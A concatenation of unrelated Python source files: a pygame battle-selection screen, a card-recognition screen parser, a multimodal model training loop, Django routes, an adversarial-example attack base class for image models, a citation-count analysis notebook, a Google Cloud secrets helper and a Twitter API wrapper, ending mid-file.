self.game.player.skills = dict(self.original_player_skills)
return True
if event.key == pygame.K_RETURN:
if len(self.warriors) == 0:
errors = True
error = self.no_chosed_warriors
elif len(self.enemies) == 0:
errors = True
error = self.no_chosed_enemies
else:
# Flip warrir images
self.change_image_direction()
# Start battle
battle = Battle(self.game,
self.warriors,
self.enemies)
battle.start_battle()
# Clear warriors and enemies
self.clear()
# Get character image and rects
self.character_images, self.character_rects = self.get_rects_and_images()
# Display bg and title
self.window.blit(self.battle_bg, [0, 0])
self.window.blit(self.title, [self.game.center_text_x(self.title), 50])
# Draw unlocked characters
for char, charimg, imgrect in zip(self.characters, self.character_images, self.character_rects):
self.window.blit(charimg,
[imgrect.x, imgrect.y])
# Check if clicked character
try:
clicked_char, pressed_btn = self.game.clicked_surface_rect(imgrect, True, True)
print pressed_btn
except TypeError:
clicked_char = False
# Add clicked to warriors or to enemies group
if clicked_char and pressed_btn[0] and len(self.warriors) < 3:
self.characters.remove(char)
self.warriors.append(char)
self.warrior_images.append(charimg)
elif clicked_char and pressed_btn[2] and len(self.enemies) < 3:
self.characters.remove(char)
self.enemies.append(char)
self.enemy_images.append(charimg)
# Draw enemies
self.window.blit(self.enemies_text,
[self.game.WINDOW_WIDTH/1.3,
self.game.WINDOW_HEIGHT/5])
enemy_rects = self.set_chosed_chars_rects(
len(self.enemies),
self.game.WINDOW_WIDTH/1.7,
self.game.WINDOW_HEIGHT/4,
100)
for enemy, enemyimg, enemyrect in zip(self.enemies,
self.enemy_images,
enemy_rects):
self.window.blit(enemyimg, [enemyrect.x, enemyrect.y])
clicked_enemy = self.game.clicked_surface_rect(enemyrect)
if clicked_enemy:
# Remove from enemies and add to all characters
self.enemies.remove(enemy)
self.enemy_images.remove(enemyimg)
self.characters.append(enemy)
# Draw warriors
self.window.blit(self.warriors_text,
[self.game.WINDOW_WIDTH/6,
self.game.WINDOW_HEIGHT/5])
warrior_rects = self.set_chosed_chars_rects(
len(self.warriors),
20,
self.game.WINDOW_HEIGHT/4,
100)
for warrior, warriorimg, warriorect in zip(self.warriors,
self.warrior_images,
warrior_rects):
self.window.blit(warriorimg, [warriorect.x, warriorect.y])
clicked_warrior = self.game.clicked_surface_rect(warriorect)
if clicked_warrior:
# Remove from warriors and add to all characters
self.warriors.remove(warrior)
self.warrior_images.remove(warriorimg)
self.characters.append(warrior)
# Draw errors if any
if errors:
self.window.blit(error,
[20, self.game.WINDOW_HEIGHT/1.1])
# Update everything and set clock
pygame.display.update()
self.game.clock.tick(self.game.FPS)
|
from Board import Board
from Board import Card
import numpy as np
from PIL import Image, ImageGrab
class ScreenParser:
"""
Screen Parser
"""
def __init__(self):
self.recognizer = CardRecognizer()
self.origin = None
def capture_screenshot(self, im_path='screenshot.png'):
im = ImageGrab.grab()
im.save(im_path)
def parse_screenshot(self, im_path='screenshot.png'):
"""
Input a screenshot and return with Board
"""
self.origin = Image.open(im_path).convert('RGB')
tableau = self.__split_tableau_area__()
foundation = self.__split_foundation_area__()
board = Board(tableau = tableau)
for card in foundation:
for i in range(card.number):
board.foundation.addToFoundation(card.color)
return board
def __split_tableau_area__(self):
(left, upper, right, lower) = (173, 310, 187, 324)
(ds, rs) = (31, 152)
tableau = [[] for i in range(8)]
for i in xrange(8):
for j in xrange(5):
box = (left+rs*i, upper+ds*j, right+rs*i, lower+ds*j)
reg = self.origin.crop(box)
card = self.recognizer.recognize_card(reg)
if card:
tableau[i].append(card)
else:
break
return tableau
def __split_foundation_area__(self):
(left, upper, right, lower) = (933, 46, 947, 60)
rs = 152
foundation = []
for i in xrange(3):
for j in xrange(9):
box = (left+rs*i, upper-j, right+rs*i, lower-j)
reg = self.origin.crop(box)
card = self.recognizer.recognize_card(reg)
if card and card.number == j+1:
foundation.append(card)
break
return foundation
class CardRecognizer:
"""
Card Recognizer
"""
def __init__(self):
self.type_model = np.load('card_type.npy')
def recognize_card(self, im):
"""
recognize a card with its image
"""
src = np.array(list(im.getdata()))
typ = self.__recognize_card_type__(src)
if typ and typ < 10:
color = self.__recognize_card_color__(src)
return Card(color, typ)
elif typ:
return Card(typ-7, None)
else:
return None
def __recognize_card_type__(self, src):
threshold = 28
test = ((src[0]-src)>8).any(1)
for i in xrange(13):
if np.sum(np.logical_xor(self.type_model[i], test)) < threshold:
return i+1
return None
def __recognize_card_color__(self, src):
(r_threshold, g_threshold, threshold) = (80, 50, 30)
dif = src - np.array([193, 195, 179])
if np.sum(dif[:,0]<(dif[:,1]-r_threshold)) > threshold:
return 1 # red
if np.sum(dif[:,1]<(dif[:,0]-g_threshold)) > threshold:
return 0 # green
return 2 # black
|
import torch
from torch import nn
import sys
from src import models
from src import ctc
from src.utils import *
import torch.optim as optim
import numpy as np
import time
from torch.optim.lr_scheduler import ReduceLROnPlateau
import os
import pickle
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import accuracy_score, f1_score
from src.eval_metrics import *
####################################################################
#
# Construct the model and the CTC module (which may not be needed)
#
####################################################################
def get_CTC_module(hyp_params):
a2l_module = getattr(ctc, 'CTCModule')(in_dim=hyp_params.orig_d_a, out_seq_len=hyp_params.l_len)
v2l_module = getattr(ctc, 'CTCModule')(in_dim=hyp_params.orig_d_v, out_seq_len=hyp_params.l_len)
return a2l_module, v2l_module
def initiate(hyp_params, train_loader, valid_loader, test_loader):
model = getattr(models, hyp_params.model+'Model')(hyp_params)
if hyp_params.use_cuda:
model = model.cuda()
optimizer = getattr(optim, hyp_params.optim)(model.parameters(), lr=hyp_params.lr)
criterion = getattr(nn, hyp_params.criterion)()
if hyp_params.aligned or hyp_params.model=='MULT':
ctc_criterion = None
ctc_a2l_module, ctc_v2l_module = None, None
ctc_a2l_optimizer, ctc_v2l_optimizer = None, None
else:
from warpctc_pytorch import CTCLoss
ctc_criterion = CTCLoss()
ctc_a2l_module, ctc_v2l_module = get_CTC_module(hyp_params)
if hyp_params.use_cuda:
ctc_a2l_module, ctc_v2l_module = ctc_a2l_module.cuda(), ctc_v2l_module.cuda()
ctc_a2l_optimizer = getattr(optim, hyp_params.optim)(ctc_a2l_module.parameters(), lr=hyp_params.lr)
ctc_v2l_optimizer = getattr(optim, hyp_params.optim)(ctc_v2l_module.parameters(), lr=hyp_params.lr)
scheduler = ReduceLROnPlateau(optimizer, mode='min', patience=hyp_params.when, factor=0.1, verbose=True)
settings = {'model': model,
'optimizer': optimizer,
'criterion': criterion,
'ctc_a2l_module': ctc_a2l_module,
'ctc_v2l_module': ctc_v2l_module,
'ctc_a2l_optimizer': ctc_a2l_optimizer,
'ctc_v2l_optimizer': ctc_v2l_optimizer,
'ctc_criterion': ctc_criterion,
'scheduler': scheduler}
return train_model(settings, hyp_params, train_loader, valid_loader, test_loader)
####################################################################
#
# Training and evaluation scripts
#
####################################################################
def train_model(settings, hyp_params, train_loader, valid_loader, test_loader):
model = settings['model']
optimizer = settings['optimizer']
criterion = settings['criterion']
ctc_a2l_module = settings['ctc_a2l_module']
ctc_v2l_module = settings['ctc_v2l_module']
ctc_a2l_optimizer = settings['ctc_a2l_optimizer']
ctc_v2l_optimizer = settings['ctc_v2l_optimizer']
ctc_criterion = settings['ctc_criterion']
scheduler = settings['scheduler']
def train(model, optimizer, criterion, ctc_a2l_module, ctc_v2l_module, ctc_a2l_optimizer, ctc_v2l_optimizer, ctc_criterion):
epoch_loss = 0
model.train()
num_batches = hyp_params.n_train // hyp_params.batch_size
proc_loss, proc_size = 0, 0
start_time = time.time()
for i_batch, (batch_X, batch_Y, batch_META) in enumerate(train_loader):
sample_ind, text, audio, vision = batch_X
eval_attr = batch_Y.squeeze(-1) # if num of labels is 1
model.zero_grad()
if ctc_criterion is not None:
ctc_a2l_module.zero_grad()
ctc_v2l_module.zero_grad()
if hyp_params.use_cuda:
with torch.cuda.device(0):
text, audio, vision, eval_attr = text.cuda(), audio.cuda(), vision.cuda(), eval_attr.cuda()
if hyp_params.dataset == 'iemocap':
eval_attr = eval_attr.long()
batch_size = text.size(0)
batch_chunk = hyp_params.batch_chunk
######## CTC STARTS ######## Do not worry about this if not working on CTC
if ctc_criterion is not None:
ctc_a2l_net = nn.DataParallel(ctc_a2l_module) if batch_size > 10 else ctc_a2l_module
ctc_v2l_net = nn.DataParallel(ctc_v2l_module) if batch_size > 10 else ctc_v2l_module
audio, a2l_position = ctc_a2l_net(audio) # audio now is the aligned to text
vision, v2l_position = ctc_v2l_net(vision)
## Compute the ctc loss
l_len, a_len, v_len = hyp_params.l_len, hyp_params.a_len, hyp_params.v_len
# Output Labels
l_position = torch.tensor([i+1 for i in range(l_len)]*batch_size).int().cpu()
# Specifying each output length
l_length = torch.tensor([l_len]*batch_size).int().cpu()
# Specifying each input length
a_length = torch.tensor([a_len]*batch_size).int().cpu()
v_length = torch.tensor([v_len]*batch_size).int().cpu()
ctc_a2l_loss = ctc_criterion(a2l_position.transpose(0,1).cpu(), l_position, a_length, l_length)
ctc_v2l_loss = ctc_criterion(v2l_position.transpose(0,1).cpu(), l_position, v_length, l_length)
ctc_loss = ctc_a2l_loss + ctc_v2l_loss
ctc_loss = ctc_loss.cuda() if hyp_params.use_cuda else ctc_loss
else:
ctc_loss = 0
######## CTC ENDS ########
combined_loss = 0
net = nn.DataParallel(model) if batch_size > 10 else model
if batch_chunk > 1:
raw_loss = combined_loss = 0
text_chunks = text.chunk(batch_chunk, dim=0)
audio_chunks = audio.chunk(batch_chunk, dim=0)
vision_chunks = vision.chunk(batch_chunk, dim=0)
eval_attr_chunks = eval_attr.chunk(batch_chunk, dim=0)
for i in range(batch_chunk):
text_i, audio_i, vision_i = text_chunks[i], audio_chunks[i], vision_chunks[i]
eval_attr_i = eval_attr_chunks[i]
preds_i, hiddens_i = net(text_i, audio_i, vision_i)
if hyp_params.dataset == 'iemocap':
preds_i = preds_i.view(-1, 2)
eval_attr_i = eval_attr_i.view(-1)
raw_loss_i = criterion(preds_i, eval_attr_i) / batch_chunk
raw_loss += raw_loss_i
raw_loss_i.backward()
ctc_loss.backward()
combined_loss = raw_loss + ctc_loss
else:
preds, hiddens = net(text, audio, vision)
if hyp_params.dataset == 'iemocap':
preds = preds.view(-1, 2)
eval_attr = eval_attr.view(-1)
raw_loss = criterion(preds, eval_attr)
combined_loss = raw_loss + ctc_loss
combined_loss.backward()
if ctc_criterion is not None:
torch.nn.utils.clip_grad_norm_(ctc_a2l_module.parameters(), hyp_params.clip)
torch.nn.utils.clip_grad_norm_(ctc_v2l_module.parameters(), hyp_params.clip)
ctc_a2l_optimizer.step()
ctc_v2l_optimizer.step()
torch.nn.utils.clip_grad_norm_(model.parameters(), hyp_params.clip)
optimizer.step()
proc_loss += raw_loss.item() * batch_size
proc_size += batch_size
epoch_loss += combined_loss.item() * batch_size
if i_batch % hyp_params.log_interval == 0 and i_batch > 0:
avg_loss = proc_loss / proc_size
elapsed_time = time.time() - start_time
print('Epoch {:2d} | Batch {:3d}/{:3d} | Time/Batch(ms) {:5.2f} | Train Loss {:5.4f}'.
format(epoch, i_batch, num_batches, elapsed_time * 1000 / hyp_params.log_interval, avg_loss))
proc_loss, proc_size = 0, 0
start_time = time.time()
return epoch_loss / hyp_params.n_train
def evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=False):
model.eval()
loader = test_loader if test else valid_loader
total_loss = 0.0
results = []
truths = []
with torch.no_grad():
for i_batch, (batch_X, batch_Y, batch_META) in enumerate(loader):
sample_ind, text, audio, vision = batch_X
eval_attr = batch_Y.squeeze(dim=-1) # if num of labels is 1
if hyp_params.use_cuda:
with torch.cuda.device(0):
text, audio, vision, eval_attr = text.cuda(), audio.cuda(), vision.cuda(), eval_attr.cuda()
if hyp_params.dataset == 'iemocap':
eval_attr = eval_attr.long()
batch_size = text.size(0)
if (ctc_a2l_module is not None) and (ctc_v2l_module is not None):
ctc_a2l_net = nn.DataParallel(ctc_a2l_module) if batch_size > 10 else ctc_a2l_module
ctc_v2l_net = nn.DataParallel(ctc_v2l_module) if batch_size > 10 else ctc_v2l_module
audio, _ = ctc_a2l_net(audio) # audio aligned to text
vision, _ = ctc_v2l_net(vision) # vision aligned to text
net = nn.DataParallel(model) if batch_size > 10 else model
preds, _ = net(text, audio, vision)
if hyp_params.dataset == 'iemocap':
preds = preds.view(-1, 2)
eval_attr = eval_attr.view(-1)
total_loss += criterion(preds, eval_attr).item() * batch_size
# Collect the results into dictionary
results.append(preds)
truths.append(eval_attr)
avg_loss = total_loss / (hyp_params.n_test if test else hyp_params.n_valid)
results = torch.cat(results)
truths = torch.cat(truths)
return avg_loss, results, truths
best_valid = 1e8
for epoch in range(1, hyp_params.num_epochs+1):
start = time.time()
train(model, optimizer, criterion, ctc_a2l_module, ctc_v2l_module, ctc_a2l_optimizer, ctc_v2l_optimizer, ctc_criterion)
val_loss, _, _ = evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=False)
test_loss, _, _ = evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=True)
end = time.time()
duration = end-start
scheduler.step(val_loss) # Decay learning rate by validation loss
print("-"*50)
print('Epoch {:2d} | Time {:5.4f} sec | Valid Loss {:5.4f} | Test Loss {:5.4f}'.format(epoch, duration, val_loss, test_loss))
print("-"*50)
if val_loss < best_valid:
print(f"Saved model at pre_trained_models/{hyp_params.name}.pt!")
save_model(hyp_params, model, name=hyp_params.name)
best_valid = val_loss
model = load_model(hyp_params, name=hyp_params.name)
_, results, truths = evaluate(model, ctc_a2l_module, ctc_v2l_module, criterion, test=True)
if hyp_params.dataset == "mosei_senti":
eval_mosei_senti(results, truths, True)
elif hyp_params.dataset == 'mosi':
eval_mosi(results, truths, True)
elif hyp_params.dataset == 'iemocap':
eval_iemocap(results, truths)
sys.stdout.flush()
input('[Press Any Key to start another run]')
|
from django.conf.urls import *
from django.contrib.auth.decorators import permission_required
import signbank.video.views
urlpatterns = [
url(r'^video/(?P<videoid>\d+)$', signbank.video.views.video),
url(r'^upload/', signbank.video.views.addvideo),
url(r'^delete/(?P<videoid>\d+)$', signbank.video.views.deletevideo),
url(r'^create_still_images/', permission_required('dictionary.change_gloss')(signbank.video.views.create_still_images))
] |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The base model of the model.
"""
# TODO: support batch input.
import logging
from abc import ABCMeta
from abc import abstractmethod
import paddle
class Attack(object):
"""
Abstract base class for adversarial attacks. `Attack` represent an
adversarial attack which search an adversarial example. Subclass should
implement the _apply(self, adversary, **kwargs) method.
Args:
model(Model): an instance of a models.base.Model.
norm(str): 'Linf' or 'L2', the norm of the threat model.
epsilon_ball(float): the bound on the norm of the AE.
"""
__metaclass__ = ABCMeta
def __init__(self, model, norm='Linf', epsilon_ball=8/255, epsilon_stepsize=2/255):
# norm='L2', epsilon_ball=128/255, epsilon_stepsize=15/255
self.model = model
self._device = paddle.get_device()
assert norm in ('Linf', 'L2')
self.norm = norm
self.epsilon_ball = epsilon_ball
self.epsilon_stepsize = epsilon_stepsize
self.normalize = paddle.vision.transforms.Normalize(mean=self.model.normalization_mean,
std=self.model.normalization_std)
def __call__(self, adversary, **kwargs):
"""
Generate the adversarial sample.
Args:
adversary(object): The adversary object.
**kwargs: Other named arguments.
"""
# make sure data in adversary is compatible with self.model
adversary.routine_check(self.model)
adversary.generate_denormalized_original(self.model.input_channel_axis,
self.model.normalization_mean,
self.model.normalization_std)
# _apply generate denormalized AE to perturb adversarial in pre-normalized domain
adversary = self._apply(adversary, **kwargs)
return adversary
def input_preprocess(self, img):
"""
Normalize img and add batchsize dimension safely.
Args:
img: paddle.tensor. initial input before normalization.
Returns:
unaked_img_normalized: paddle.tensor. normalized img that covered with batchsize dimension.
"""
assert isinstance(img, paddle.Tensor)
img_normalized = self.normalize(img)
if len(self.model.input_shape) < img_normalized.ndim:
unaked_img_normalized = img_normalized
else:
unaked_img_normalized = paddle.unsqueeze(img_normalized, axis=0)
return unaked_img_normalized
def safe_delete_batchsize_dimension(self, img):
"""
Compare dimension setting in model, delete batchsize,
dimension (axis=0) if there's dimension redundancy.
Args:
img: paddle.tensor
Returns:
naked_img: paddle.tensor. img that deleted redundant batchsize dimension.
"""
assert isinstance(img, paddle.Tensor)
if len(self.model.input_shape) < img.ndim:
naked_img = paddle.squeeze(img, axis=0)
else:
naked_img = img
return naked_img
@abstractmethod
def _apply(self, adversary, **kwargs):
"""
Search an adversarial example.
Args:
adversary(object): The adversary object.
**kwargs: Other named arguments.
retun
"""
raise NotImplementedError
|
#!/usr/bin/env python
# coding: utf-8
# # This will create plots for institutions of universities in THE WUR univs only and for the period of 2007-2017. The input dataset contains info of THE WUR univs only but for any period of time.
# #### The unpaywall dump used was from (April or June) 2018; hence analysis until 2017 only is going to be included.
# ## Question : What is the distribution of incoming citation counts for OA and non-OA papers published by THE WUR univ within each country?
# In[1]:
# standard path wrangling to be able to import project config and sources
import os
import sys
from os.path import join
root = os.path.dirname(os.getcwd())
sys.path.append(root)
print('Project root: {}'.format(root))
# In[2]:
sys.path.append(join(root,"spark/shared/"))
from MAG_utils import *
# In[ ]:
# In[3]:
# Built-in
import json
# Installed
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib import rc,rcParams
from matplotlib.patches import Rectangle
import unicodedata
import re
from statistics import mean
# In[4]:
cfg = None
with open(join(root,"spark/config.json")) as fp:
cfg = json.load(fp)
# In[5]:
# cfg
# In[6]:
cnames_for_plot = {
"austria" : "Austria",
"brazil" : "Brazil",
"germany" : "Germany",
"india" : "India",
"portugal" : "Portugal",
"russia" : "Russia",
"uk" : "UK",
"usa" : "USA"
}
# In[7]:
output_dir = join(root,"documents/analysis/dataset_selection_question5")
# In[ ]:
# Create a new directory to save results
os.makedirs(output_dir)
# In[8]:
study_years = [2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017]
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# # Extraction of Citation Counts of OA and unknown papers for each university
# In[9]:
def get_univ_papers_citation_counts(country_papers_OA_df, univs_name):
'''
Get the plot of count of citations for both OA and non-OA papers for each university in the input country
'''
univs_info = {}
univs_not_found = []
univs_found = []
for org_univ_name in set(univs_name): # remove duplicate univ names in the THE list, if any
# print(org_univ_name)
THE_univ_name_normalised = mag_normalisation_institution_names(org_univ_name)
'''
The dataframe that will be selected for the current univ is either :
1. When the MAG normalizedname column matches to THE_univ_name_normalised
or
2. When the MAG normalised(wikiname) matches to THE_univ_name_normalised -- this matches English names (in MAG wiki links as well as THE) of non English name (in MAG normalisedname or displayname) universities.
'''
univ_papers_df_set1 = country_papers_OA_df[country_papers_OA_df['normalizedname']==THE_univ_name_normalised]
univ_papers_df_set2 = country_papers_OA_df[country_papers_OA_df['normalizedwikiname']==THE_univ_name_normalised]
# The records in two sets can be the excatly the same
# Concat and remove exact duplicates -- https://stackoverflow.com/a/21317570/530399
univ_papers_df = pd.concat([univ_papers_df_set1, univ_papers_df_set2]).drop_duplicates().reset_index(drop=True)
# Put additional criteria that these papers are from 2007 till 2017
univ_papers_df = univ_papers_df[univ_papers_df['year'].isin(study_years)]
# Same paper will have multiple entries if there are multiple authors for that paper from same university.
# This is not necessary because the input dataset was already prepared to exclude such duplicates.
# univ_papers_df = univ_papers_df.drop_duplicates(subset="paperid")
count_total_univ_papers = len(univ_papers_df)
# For those I couldn't match/find their name, it is not fair to say that their OA count is 0. Should be excluded from the graph.
if count_total_univ_papers==0:
univs_not_found.append(org_univ_name+" @ "+THE_univ_name_normalised)
else:
univs_found.append(org_univ_name)
univs_info[org_univ_name] = {}
OA_univ_papers_df = univ_papers_df[univ_papers_df['is_OA']=="true"] # stored as a string in csv
unknown_univ_papers_df = univ_papers_df[univ_papers_df['is_OA']!="true"] # stored as a string in csv
# Get the total count of citations for OA and unknown papers -- int casting needed to convert numpy int (json-incompatible) to python int
univs_info[org_univ_name]["citationcount_OA_papers"] = int(OA_univ_papers_df['citationcount'].sum())
univs_info[org_univ_name]["citationcount_unknown_papers"] = int(unknown_univ_papers_df['citationcount'].sum())
return univs_info, univs_not_found, univs_found
# In[10]:
all_countries_all_univs_OA_info = {}
all_countries_univs_found_not_found = {}
for country_name,univs_name in cfg['data']['all_THE_WUR_institutions_by_country'].items():
print("\nProcesing for dataset of univs in "+country_name+"\n")
all_countries_univs_found_not_found[country_name] = {}
# CSV has repeated header from multiple partitions of the merge on pyspark csv output. Hence need to treat as string.
country_papers_OA_df = pd.read_csv(join(root,"data/processed/cc_oa_"+country_name+"_papers.csv"), header=0, sep=",", dtype={'is_OA': object, "url_lists_as_string": object, "year": object, "wikipage": object, "normalizedwikiname": object, "citationcount": object}) # object means string
# Then eliminate problematic lines
# temp fix until spark csv merge header issue is resolved -- the header line is present in each re-partition's output csv
country_papers_OA_df.drop(country_papers_OA_df[country_papers_OA_df.paperid == "paperid"].index, inplace=True)
# Then reset dtypes as needed.
country_papers_OA_df = country_papers_OA_df.astype({'year':int}) # todo : for other types too including is_OA and update the check method to boolean type
country_papers_OA_df = country_papers_OA_df.astype({'citationcount':int})
univs_info, univs_not_found, univs_found = get_univ_papers_citation_counts(country_papers_OA_df, univs_name)
all_countries_all_univs_OA_info[country_name] = univs_info
count_total_univs = len(univs_not_found) + len(univs_found)
not_found_details = {}
not_found_details['univ_names'] = univs_not_found
not_found_details['count_univs'] = len(univs_not_found)
not_found_details['percent_univs'] = (len(univs_not_found)*100.00)/count_total_univs
found_details = {}
found_details['univ_names'] = univs_found
found_details['count_univs'] = len(univs_found)
found_details['percent_univs'] = (len(univs_found)*100.00)/count_total_univs
all_details = {}
all_details['count_univs'] = count_total_univs
all_countries_univs_found_not_found[country_name]['not_found'] = not_found_details
all_countries_univs_found_not_found[country_name]['found'] = found_details
all_countries_univs_found_not_found[country_name]['all'] = all_details
print("Computed citation counts for all univs in "+country_name+"\n")
# In[11]:
# Write text files with the infos
with open(join(output_dir,'all_countries_univs_found_not_found.txt'), 'w') as file:
file.write(json.dumps(all_countries_univs_found_not_found, sort_keys=True, indent=4, ensure_ascii=False))
with open(join(output_dir,'all_countries_all_univs_cc_info.txt'), 'w') as file:
file.write(json.dumps(all_countries_all_univs_OA_info, sort_keys=True, indent=4, ensure_ascii=False))
# In[ ]:
# # Load data from previously saved files
# In[12]:
with open(join(output_dir,'all_countries_all_univs_cc_info.txt')) as file:
all_countries_all_univs_OA_info = json.load(file)
# all_countries_all_univs_OA_info
# # Create bar plot for each of the countries
# In[13]:
def label_bar_with_value(ax, rects, value_labels):
"""
Attach a text label above each bar displaying its height
"""
for i in range(len(rects)):
rect = rects[i]
label_value = value_labels[i]
ax.text(rect.get_x() + rect.get_width()/2., 1.05*rect.get_height(),
'%s' % label_value,
ha='center', va='bottom')
def create_citation_count_distribution_bar_chart(univs_details, save_fname, x_label, save_file=True):
# https://chrisalbon.com/python/data_visualization/matplotlib_grouped_bar_plot/
# https://stackoverflow.com/a/42498711/530399
univs_name = [x for x in univs_details.keys()]
univs_data = univs_details.values()
univs_oa_citation_counts = [x['citationcount_OA_papers'] for x in univs_data]
univs_unknown_citation_counts = [x['citationcount_unknown_papers'] for x in univs_data]
raw_data = {'univs_name': univs_name,
'univs_oa_citation_counts': univs_oa_citation_counts,
'univs_unknown_citation_counts': univs_unknown_citation_counts
}
df = pd.DataFrame(raw_data, columns = ['univs_name', 'univs_oa_citation_counts', 'univs_unknown_citation_counts'])
# Compute proportion of univs_oa_citation_counts
df['proportion_univs_oa_citation_counts'] = (df['univs_oa_citation_counts'] / (df['univs_oa_citation_counts'] + df['univs_unknown_citation_counts'])) *100
# sort the df based on proportion of univs_oa_citation_counts
df = df.sort_values('proportion_univs_oa_citation_counts', ascending=False)[['univs_name', 'univs_oa_citation_counts','univs_unknown_citation_counts', 'proportion_univs_oa_citation_counts']]
# Setting the positions and width for the bars
pos = list(range(len(df['univs_name'])))
width = 0.25
# Plotting the bars
fig, ax = plt.subplots(figsize=(25,10))
# Create a bar with oa_citation_count data,
# in position pos,
oa_citation_count_bars = ax.bar(pos,
#using df['univs_oa_citation_counts'] data,
df['univs_oa_citation_counts'],
# of width
width,
# with alpha 0.5
alpha=0.5,
# with color
color='green',
)
# Set heights based on the percentages
oa_citation_counts_proportion_value_labels = [str(int(x))+"%" for x in df['proportion_univs_oa_citation_counts'].values.tolist()]
# Create a bar with unknown_citation_count data,
# in position pos + some width buffer,
plt.bar([p + width for p in pos],
#using df['univs_unknown_citation_counts'] data,
df['univs_unknown_citation_counts'],
# of width
width,
# with alpha 0.5
alpha=0.5,
# with color
color='red',
)
# Set the y axis label
ax.set_ylabel('Incoming Citation Counts')
# Set the x axis label
ax.set_xlabel(x_label)
# Set the position of the x ticks
ax.set_xticks([p + 0.5 * width for p in pos])
# Set the labels for the x ticks
ax.set_xticklabels(df['univs_name'], rotation='vertical')
# Setting the x-axis and y-axis limits
plt.xlim(min(pos)-width, max(pos)+width*4)
plt.ylim([0, max(df['univs_oa_citation_counts'] + df['univs_unknown_citation_counts'])] )
# Adding the legend and showing the plot
plt.legend(['OA papers Citation Counts', 'Unknown papers Citation Counts'], loc='upper left')
plt.grid()
label_bar_with_value(ax, oa_citation_count_bars, oa_citation_counts_proportion_value_labels)
if save_file:
plt.savefig(save_fname+".png", bbox_inches='tight', dpi=300)
plt.savefig(save_fname+".pdf", bbox_inches='tight', dpi=900)
plt.close()
return fig
# In[14]:
'''country_name = 'usa'
univs_details = all_countries_all_univs_OA_info[country_name]
create_citation_count_distribution_bar_chart(univs_details, save_fname = join(output_dir,country_name+"_"+'citationscount_distribution'), x_label = ("Universities in "+country_name), save_file=False)'''
# In[15]:
for country_name, univs_details in all_countries_all_univs_OA_info.items():
create_citation_count_distribution_bar_chart(univs_details, save_fname = join(output_dir,country_name+"_"+'citationscount_distribution'), x_label = ("Universities in "+cnames_for_plot[country_name]), save_file=True)
# In[ ]:
# In[16]:
print("\n\n\nCompleted!!!")
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
|
def DataFrameRelatorio(listaUsuarios, listaMegaBytes, listaMegaBytesPorcentagem):
'''Função que converte dados em tabela'''
#usando o pandas vamos utilizar a função para converter em tabela
tabelaDados = pd.DataFrame({
"Usuário": listaUsuarios,
"Espaço Utilizado": listaMegaBytes,
"% de Uso": listaMegaBytesPorcentagem,
})
#retornando dataframe
return tabelaDados
|
def reverse(k):
str = ""
for i in k:
str = i + str
return str
k = input('word:')
print ("awal : ",end="")
print (k)
print ("dibalik : ",end="")
print (reverse(k))
|
import os
from .gcloud import GoogleCloud
class GoogleCloudRepository:
def __init__(self, gc: GoogleCloud) -> None:
self.gc = gc
pass
def get_firebase_credential(self):
credentials = self.gc.get_secrets(filter="labels.domain:fitbit AND labels.type:firebase-config AND labels.id:credentials")
return credentials[0]
def get_realtime_db_url(self):
credentials = self.gc.get_secrets(filter="labels.domain:fitbit AND labels.type:firebase-config AND labels.id:db-url")
return credentials[0]
def get_users_secrets(self):
users_secrets = self.gc.get_secrets()
return users_secrets
def add_secret_version(self, secret_id, payload):
old_payload = self.gc.get_secret(secret_id)
new_payload = old_payload
new_payload.update(payload)
self.gc.add_secret_version(new_payload)
pass |
import abc
class Command(abc.ABC):
"""Base command class."""
name = 'base'
@abc.abstractmethod
def configure(self, parser):
"""Configures the argument parser for the command."""
pass
@abc.abstractmethod
def run(self, args):
"""Runs the command."""
pass
@classmethod
def available_commands(cls):
"""Returns dict of available commands."""
return {
class_.name: class_()
for class_ in cls._get_subclasses() if class_.name != 'base'
}
@classmethod
def _get_subclasses(cls):
for subclass in cls.__subclasses__():
yield from subclass._get_subclasses()
yield subclass
|
import time
import traceback
# .TwitterAPI is a local copy used for development purposes. If not present, import from the installed module (prod)
try:
from .TwitterAPI import TwitterAPI
except ImportError:
from TwitterAPI import TwitterAPI
def auto_retry(request):
def aux(*args, **kwargs):
# Try to perform the request several times
retries = 3
while retries > 0:
try:
response = request(*args, **kwargs)
return response
except Exception:
traceback.print_exc()
retries = retries - 1
time.sleep(60)
raise Exception("Request failed after 3 retries")
return aux
class MyTwitterAPI:
def __init__(self, api_key, api_key_secret, access_token, access_token_secret):
self.api1 = TwitterAPI(
api_key,
api_key_secret,
access_token,
access_token_secret,
api_version="1.1",
auth_type="oAuth1",
)
self.api2 = TwitterAPI(
api_key,
api_key_secret,
access_token,
access_token_secret,
api_version="2",
auth_type="oAuth1",
)
def me(self):
req = self.api1.request(
"account/verify_credentials",
params={
"include_entities": False,
"skip_status": True,
"include_email": False,
},
)
if req.status_code != 200:
raise ValueError("Twitter credentials not valid. Unable to verify user")
return req.response.json()
def get_followers(self, user_id, page_size=100):
"""Use v2 endpoint to get the followers of this account. Followers are paginated by the max amount which is 1000
See:
https://developer.twitter.com/en/docs/twitter-api/users/follows/quick-start
"""
@auto_retry
def request_followers(next_token=None):
req = self.api2.request(
f"users/:{user_id}/followers",
params={"max_results": page_size, "pagination_token": next_token},
)
if req.status_code != 200:
raise ValueError("Error while fetching followers: ", req.text)
response = req.response.json()
return response.get("data", []), response.get("meta", dict())
# Start returning followers
followers, meta = request_followers()
while followers:
for item in followers:
yield item
# Request more followers
next_token = meta.get("next_token")
if next_token:
followers, meta = request_followers(next_token)
else:
followers = []
@auto_retry
def get_tweets(self, tweets_ids):
"""
